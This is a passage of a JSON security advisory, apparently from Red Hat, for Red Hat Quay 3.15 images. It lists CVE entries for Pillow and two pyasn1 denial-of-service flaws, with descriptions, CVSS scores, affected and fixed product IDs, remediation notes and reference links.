"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:c9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:bdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "Pillow: Pillow: Controlled native heap corruption in ImageCms.ImageCmsTransform.apply API"
},
{
"cve": "CVE-2026-59885",
"cwe": {
"id": "CWE-1050",
"name": "Excessive Platform Resource Consumption within a Loop"
},
"discovery_date": "2026-07-14T18:17:12.157807+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:c9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2500380"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in pyasn1, a Python library for Abstract Syntax Notation One (ASN.1). The BER, CER, and DER decoders process OBJECT IDENTIFIER and RELATIVE-OID values in quadratic time relative to the number of arcs. A remote attacker could exploit this by providing a specially crafted payload containing an OID with many arcs, leading to excessive CPU consumption and a denial of service (DoS) in applications that decode untrusted ASN.1 data. The corresponding encoders also exhibit this quadratic behavior when re-encoding attacker-supplied values.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "pyasn1: python-pyasn1: pyasn1: Denial of Service via crafted ASN.1 OBJECT IDENTIFIER",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "A flaw was found in pyasn1. The BER, CER, and DER decoders process OBJECT IDENTIFIER and RELATIVE-OID values in quadratic time relative to the number of arcs. A small crafted payload containing an OID with many arcs consumes excessive CPU per decode() call, allowing denial of service in applications that decode untrusted ASN.1 data (certificates, LDAP, SNMP, Kerberos). The corresponding encoders exhibit the same behavior when re-encoding attacker-supplied values. The arc-size limit introduced for CVE-2026-23490 does not mitigate this issue. This issue is fixed in pyasn1 version 0.6.4.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:bdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:c9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-59885"
},
{
"category": "external",
"summary": "RHBZ#2500380",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2500380"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-59885",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-59885"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-59885",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59885"
},
{
"category": "external",
"summary": "https://github.com/pyasn1/pyasn1/commit/45bdb19eb7df4b3780fe9c912c63e99bffc39dd9",
"url": "https://github.com/pyasn1/pyasn1/commit/45bdb19eb7df4b3780fe9c912c63e99bffc39dd9"
},
{
"category": "external",
"summary": "https://github.com/pyasn1/pyasn1/releases/tag/v0.6.4",
"url": "https://github.com/pyasn1/pyasn1/releases/tag/v0.6.4"
},
{
"category": "external",
"summary": "https://github.com/pyasn1/pyasn1/security/advisories/GHSA-8ppf-4f7h-5ppj",
"url": "https://github.com/pyasn1/pyasn1/security/advisories/GHSA-8ppf-4f7h-5ppj"
}
],
"release_date": "2026-07-14T16:40:00.515000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-30T20:01:08+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:bdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:48933"
},
{
"category": "workaround",
"details": "Update to pyasn1 version 0.6.4 or later when available for your product stream. The impact is limited to availability (denial of service) \u2014 an attacker cannot access or modify data. Applications that do not process untrusted ASN.1 input are at reduced risk.",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:c9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:bdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:c9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:bdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "pyasn1: python-pyasn1: pyasn1: Denial of Service via crafted ASN.1 OBJECT IDENTIFIER"
},
{
"cve": "CVE-2026-59886",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-07-14T17:01:19.689422+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:c9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2500041"
}
],
"notes": [
{
"category": "description",
"text": "A remote attacker can exploit this by providing specially crafted BER/CER/DER-encoded ASN.1 data with a large exponent in the REAL value. When the application subsequently prints, logs, compares, or performs arithmetic on the decoded value, this can cause excessive CPU and memory consumption, leading to a denial of service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "pyasn1: pyasn1: Denial of Service via crafted ASN.1 REAL values",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This flaw in pyasn1, rated as Important, could lead to a denial of service in Red Hat products that process untrusted ASN.1 data. A remote attacker could send a specially crafted BER, CER, or DER encoded REAL value with a large exponent, causing applications to consume excessive resources during decoding operations such as printing, logging, or arithmetic, thereby rendering the service unavailable.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:bdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64",
